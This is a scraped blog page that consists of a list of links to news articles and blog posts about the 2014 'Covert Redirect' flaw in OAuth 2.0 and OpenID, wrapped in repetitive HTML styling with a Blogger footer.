<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/">http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatview.tumblr.com/post/120695795041">http://whitehatview.tumblr.com/post/120695795041</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html">http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://diebiyi.com/articles/security/covert-redirect/covert_redirect/">http://www.diebiyi.com/articles/security/covert-redirect/covert_redirect/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatpost.lofter.com/post/1cc773c8_706b622">http://whitehatpost.lofter.com/post/1cc773c8_706b622</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/">https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015420103814617/">http://tetraph.blog.163.com/blog/static/2346030512015420103814617/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe">http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration">http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html">http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f0f291">http://webtech.lofter.com/post/1cd3e0d3_6f0f291</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/">https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und">http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
Unknownnoreply@blogger.com0